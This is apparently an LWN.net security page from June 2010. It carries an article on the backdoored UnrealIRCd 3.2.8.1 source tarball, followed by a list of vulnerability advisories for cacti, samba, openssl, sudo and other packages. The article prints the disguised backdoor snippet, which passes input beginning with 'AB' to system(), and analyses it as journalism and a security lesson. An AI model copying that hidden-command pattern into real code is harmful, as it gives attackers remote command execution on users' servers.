By Jake Edge
June 16, 2010
The discovery and announcement
of a backdoor in UnrealIRCd is
embarrassing for the project, and is certainly a real live security
vulnerability. But it is hardly the "proof" that Linux is insecure, or
less secure
than some other (proprietary) OS, as some pundits
would have it. The problem is not Linux-specific, nor is it a problem with
free software development, it is, instead, something that could
happen—has happened—to any software project.
UnrealIRCd is, as its name implies, an Internet Relay Chat (IRC) server.
It runs on most platforms, and has added a number of features that some
folks find useful in an IRC server. It is not related to the Unreal first-person shooter
game as some reported, it is simply a server that can be run to host IRC
channels for a wide variety of purposes.
From what the project can tell, around November 10, 2009 the mirrors of the
source distribution of version 3.2.8.1 of UnrealIRCd were replaced with a
version that contained a backdoor. That backdoor could be used by an
attacker to run any command on a system running the compromised server.
That command would, obviously, run with the privileges of the user that
executed the server. It took until June 12 for this swap to be noticed, so
anyone who picked up a copy of the code in that seven month period may be
vulnerable.
The backdoor
was disguised to look like a debug statement in the code:
#ifdef DEBUGMODE3
if (!memcmp(readbuf, DEBUGMODE3_INFO, 2))
DEBUG3_LOG(readbuf);
#endif
DEBUG3_LOG eventually resolves to a call to
system(),
while
DEBUGMODE3_INFO is just the string "AB". Thus commands sent
to the server that start with "AB" will be handed off directly to
system(). Not a particularly sophisticated backdoor, but an
effective one nevertheless. As the advisory points out, even servers that
are set up to require passwords from users, or even not allow any users at
all, are still vulnerable because they still take input.
The official Windows binaries were not affected by the backdoor, but there
is no reason that they couldn't have been. The problem is that the project
didn't provide any means for verifying the integrity of downloads. That
allowed the switch to be made and remain undetected for so long. Since
then, the project has started signing its
code with GPG keys.
The affected code did make it into Gentoo, which issued an update on the
14th. But the fact that "Linux" was "backdoored" brought out the usual
suspects among web pundits eager to declare that it was a watershed moment
for Linux security. While it certainly was a black eye for UnrealIRCd, it
clearly wasn't one for Linux as a whole. First off, UnrealIRCd is
installed on very few Linux systems—it can hardly be considered a
core Linux program—and even those where it is installed
are likely to be running it as a separate user (e.g. ircd) with
fairly low privileges.
But, even users with low privileges often have enough to be useful to
attackers. One could imagine spammers and botnet herders finding ways to
use the network capabilities of a basic Linux user account. The storage on
the system might be useful as well. Unless the user is running the server
as root, no direct system compromise should be possible, though it
is important to note that a local privilege escalation in the kernel
could be used to take the system over.
One of the more laughable claims about the flaw was Ed Bott's declaration
that Windows virus scanners would have detected the problem had it impacted
those binaries. Bott must be under the impression that virus scanners
somehow magically recognize backdoors in executable code. The truth, of
course, is much more prosaic: some human finds the malware and updates the
signatures that the virus scanners use. Unless this exact vulnerability
had already been injected into other Windows binaries—and thus a
signature created—no virus scanner would pick it up.
There are certainly lessons to be learned here—integrity checking is
important for one—but not those that many of the Windows-centric
columnists are pushing. Windows is no more (or less) vulnerable than Linux
to these
kinds of attacks; when attackers can control the code that you run, it is
"game over" no matter what OS you run. It is possible that
SELinux, TOMOYO, or AppArmor could mitigate this kind of attack to some
extent, but it is somewhat unlikely that anyone has (yet) tackled
configuring any of those for a fairly obscure IRC server.
It is another reminder that we need to be more vigilant about protecting
our code distribution networks. It may be somewhat less common these
days—many folks get their new software from distribution
repositories—but grabbing a tarball, untarring, and typing:
./configure; make; make install
is a longstanding tradition in the open source world. In order to continue
that, it would be very helpful to automatically check signatures when
downloading, but the mechanism for doing so is, as yet, unclear. For now, though,
checking signatures manually, and
being very leery of unsigned code, is the prudent course.
Comments (9 posted)
Brief items
Fundamentally a password is something that can have it's value rapidly drop
to zero without warning. It doesn't wear out.
--
Russell
Coker on password expiration
ENF [Electrical Network Frequency analysis] relies on frequency variations
in the electricity supplied by the National Grid. Digital devices such as
CCTV recorders, telephone recorders and camcorders that are plugged in to
or located near the mains pick up these deviations in the power supply,
which are caused by peaks and troughs in demand. Battery-powered devices
are not immune to to ENF analysis, as grid frequency variations can be
induced in their recordings from a distance.
--
The
Register reports on a new forensic technique
Comments (none posted)
PCWorld
looks
at a backdoor in Unreal IRC, an Internet relay chat platform for Linux. "
An announcement on the Unreal IRCd Forums states "This is very embarrassing...We found out that the Unreal3.2.8.1.tar.gz file on our mirrors has been replaced quite a while ago with a version with a backdoor (trojan) in it. This backdoor allows a person to execute ANY command with the privileges of he user running the ircd. The backdoor can be executed regardless of any user restrictions (so even if you have passworded server or hub that doesn't allow any users in).""
Comments (13 posted)
New vulnerabilities
cacti: SQL injection
| Package(s): | cacti |
CVE #(s): | CVE-2010-2092
|
| Created: | June 14, 2010 |
Updated: | June 17, 2010 |
| Description: |
From the Debian advisory:
Stefan Esser discovered that cacti, a front-end to rrdtool for monitoring
systems and services, is not properly validating input passed to the rra_id
parameter of the graph.php script. Due to checking the input of $_REQUEST
but using $_GET input in a query an unauthenticated attacker is able to
perform SQL injections via a crafted rra_id $_GET value and an additional
valid rra_id $_POST or $_COOKIE value.
|
| Alerts: |
|
Comments (1 posted)
dhcp: denial of service
| Package(s): | dhcp |
CVE #(s): | CVE-2010-2156
|
| Created: | June 11, 2010 |
Updated: | June 30, 2010 |
| Description: |
From the Mandriva advisory:
ISC DHCP 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 allows remote
attackers to cause a denial of service (server exit) via a zero-length
client ID. |
| Alerts: |
|
Comments (none posted)
emesene: symlink attack
| Package(s): | emesene |
CVE #(s): | CVE-2010-2053
|
| Created: | June 11, 2010 |
Updated: | June 16, 2010 |
| Description: |
From the CVE entry:
emesenelib/ProfileManager.py in emesene before 1.6.2 allows local users to overwrite arbitrary files via a symlink attack on the emsnpic temporary file. |
| Alerts: |
|
Comments (none posted)
flash-player: multiple vulnerabilities
Comments (none posted)
glibc: denial of service
| Package(s): | glibc |
CVE #(s): | CVE-2009-4880
CVE-2009-4881
|
| Created: | June 10, 2010 |
Updated: | November 23, 2010 |
| Description: |
From the Debian advisory:
Maksymilian Arciemowicz discovered that the GNU C library did not
correctly handle integer overflows in the strfmon family of
functions. If a user or automated system were tricked into
processing a specially crafted format string, a remote attacker
could crash applications, leading to a denial of service.
|
| Alerts: |
|
Comments (none posted)
moin: cross-site scripting
| Package(s): | moin |
CVE #(s): | |
| Created: | June 14, 2010 |
Updated: | June 29, 2010 |
| Description: |
From the Red
Hat bugzilla:
A possible reflected cross-site scripting attack was discovered in Moin.
An attacker able to cause a user to follow a specially crafted malicious link
may be able to recover session identifiers or exploit browser vulnerabilities,
due to a vulnerable template parameter. The upstream bug report links to
patches to correct the flaw. |
| Alerts: |
|
Comments (none posted)
mono: cross-site scripting
| Package(s): | mono |
CVE #(s): | CVE-2010-1459
|
| Created: | June 15, 2010 |
Updated: | July 26, 2012 |
| Description: |
From the Pardus advisory:
The default configuration of ASP.NET in Mono before 2.6.4 has a value of
FALSE for the EnableViewStateMac property, which allows remote attackers
to conduct cross-site scripting (XSS) attacks, as demonstrated by the
__VIEWSTATE parameter to 2.0/menu/menu1.aspx in the XSP sample project. |
| Alerts: |
|
Comments (none posted)
openssl: arbitrary code execution
| Package(s): | openssl |
CVE #(s): | CVE-2010-0742
|
| Created: | June 15, 2010 |
Updated: | June 22, 2010 |
| Description: |
From the Pardus advisory:
The Cryptographic Message Syntax (CMS) implementation in
crypto/cms/cms_asn1.c in OpenSSL before 0.9.8o and 1.x before 1.0.0a
does not properly handle structures that contain OriginatorInfo, which
allows context-dependent attackers to modify invalid memory locations or
conduct double-free attacks, and possibly execute arbitrary code, via
unspecified vectors.
|
| Alerts: |
|
Comments (none posted)
openssl: information leak
| Package(s): | openssl |
CVE #(s): | CVE-2010-1633
|
| Created: | June 15, 2010 |
Updated: | June 16, 2010 |
| Description: |
From the CVE entry:
RSA verification recovery in the EVP_PKEY_verify_recover function in OpenSSL 1.x before 1.0.0a, as used by pkeyutl and possibly other applications, returns uninitialized memory upon failure, which might allow context-dependent attackers to bypass intended key requirements or obtain sensitive information via unspecified vectors. NOTE: some of these details are obtained from third party information. |
| Alerts: |
|
Comments (none posted)
pcsc-lite: privilege escalation
| Package(s): | pcsc-lite |
CVE #(s): | CVE-2010-0407
|
| Created: | June 11, 2010 |
Updated: | September 24, 2010 |
| Description: |
From the Debian advisory:
It was discovered that PCSCD, a daemon to access smart cards, was vulnerable
to a buffer overflow allowing a local attacker to elevate his privileges
to root.
|
| Alerts: |
|
Comments (none posted)
python: multiple vulnerabilities
| Package(s): | python |
CVE #(s): | CVE-2010-1634
CVE-2010-2089
CVE-2008-5983
|
| Created: | June 14, 2010 |
Updated: | October 25, 2012 |
| Description: |
From the CVE entries:
Multiple integer overflows in audioop.c in the audioop module in Python 2.6, 2.7, 3.1, and 3.2 allow context-dependent attackers to cause a denial of service (application crash) via a large fragment, as demonstrated by a call to audioop.lin2lin with a long string in the first argument, leading to a buffer overflow. NOTE: this vulnerability exists because of an incorrect fix for CVE-2008-3143.5. (CVE-2010-1634)
The audioop module in Python 2.7 and 3.2 does not verify the relationships between size arguments and byte string lengths, which allows context-dependent attackers to cause a denial of service (memory corruption and application crash) via crafted arguments, as demonstrated by a call to audioop.reverse with a one-byte string, a different vulnerability than CVE-2010-1634. (CVE-2010-2089)
Untrusted search path vulnerability in the PySys_SetArgv API function in Python 2.6 and earlier, and possibly later versions, prepends an empty string to sys.path when the argv[0] argument does not contain a path separator, which might allow local users to execute arbitrary code via a Trojan horse Python file in the current working directory. (CVE-2008-5983) |
| Alerts: |
|
Comments (none posted)
samba: denial of service
| Package(s): | samba |
CVE #(s): | |
| Created: | June 15, 2010 |
Updated: | June 16, 2010 |
| Description: |
From the Pardus advisory:
The Server Message Block (SMB) protocol, also known as Common Internet
File System (CIFS) acts as an application-layer protocol to provide
shared access to files, printers and Inter-Process Communication (IPC).
It is also a transport for Distributed Computing Environment / Remote
Procedure Call (DCE / RPC) operations After negotiating an SMB
communication the client sends a 'Session Setup AndX' packet to
negotiate a session in order to be able to connect on a specific share.
IT is possible to trigger an uninitialized variable read by sending a
specific 'Sessions Setup AndX' query. Successful exploitation of the
issue will result in a denial of service. |
| Alerts: |
|
Comments (none posted)
samba: arbitrary code execution
| Package(s): | samba |
CVE #(s): | CVE-2010-2063
|
| Created: | June 16, 2010 |
Updated: | October 18, 2010 |
| Description: |
From the Ubuntu advisory:
Jun Mao discovered that Samba did not correctly validate SMB1 packet
contents. An unauthenticated remote attacker could send specially crafted
network traffic that could execute arbitrary code as the root user.
|
| Alerts: |
|
Comments (none posted)
sudo: privilege escalation
| Package(s): | sudo |
CVE #(s): | CVE-2010-1646
|
| Created: | June 15, 2010 |
Updated: | January 25, 2011 |
| Description: |
From the Pardus advisory:
The secure path feature in env.c in sudo 1.3.1 through 1.6.9p22 and
1.7.0 through 1.7.2p6 does not properly handle an environment that
contains multiple PATH variables, which might allow local users to gain
privileges via a crafted value of the last PATH variable. |
| Alerts: |
|
Comments (none posted)
tiff: arbitrary code execution
| Package(s): | tiff |
CVE #(s): | |
| Created: | June 15, 2010 |
Updated: | June 16, 2010 |
| Description: |
From the Pardus advisory:
Multiple integer overflows in the handling of TIFF files may result in a
heap buffer overflow. Opening a maliciously crafted TIFF file may lead
to an unexpected application termination or arbitrary code execution.
These issues are addressed through improved bounds checking. Credit to
Kevin Finisterre of digitalmunition.com for reporting this issue. |
| Alerts: |
|
Comments (none posted)
unrealircd: multiple vulnerabilities
| Package(s): | unrealircd |
CVE #(s): | |
| Created: | June 15, 2010 |
Updated: | June 16, 2010 |
| Description: |
From the Gentoo advisory:
Multiple vulnerabilities have been reported in UnrealIRCd:
* The vendor reported a buffer overflow in the user authorization
code.
* The vendor reported that the distributed source code of UnrealIRCd
was compromised and altered to include a system() call that could be
called with arbitrary user input.
A remote attacker could exploit these vulnerabilities to cause the
execution of arbitrary commands with the privileges of the user running
UnrealIRCd, or a Denial of Service condition. |
| Alerts: |
|
Comments (none posted)
wireshark: multiple vulnerabilities
| Package(s): | wireshark |
CVE #(s): | |
| Created: | June 10, 2010 |
Updated: | June 16, 2010 |
| Description: |
From the wireshark advisory:
The SMB dissector could dereference a NULL pointer. (Bug 4734)
Versions affected: 0.99.6 to 1.0.13, 1.2.0 to 1.2.8
J. Oquendo discovered that the ASN.1 BER dissector could overrun the stack.
Versions affected: 0.10.13 to 1.0.13, 1.2.0 to 1.2.8
The SMB PIPE dissector could dereference a NULL pointer on some platforms.
Versions affected: 0.8.20 to 1.0.13, 1.2.0 to 1.2.8
The SigComp Universal Decompressor Virtual Machine could go into an infinite loop. (Bug 4826)
Versions affected: 0.10.7 to 1.0.13, 1.2.0 to 1.2.8
The SigComp Universal Decompressor Virtual Machine could overrun a buffer. (Bug 4837)
Versions affected: 0.10.8 to 1.0.13, 1.2.0 to 1.2.8 |
| Alerts: |
|
Comments (none posted)
Page editor: Jake Edge
Next page: Kernel development>>
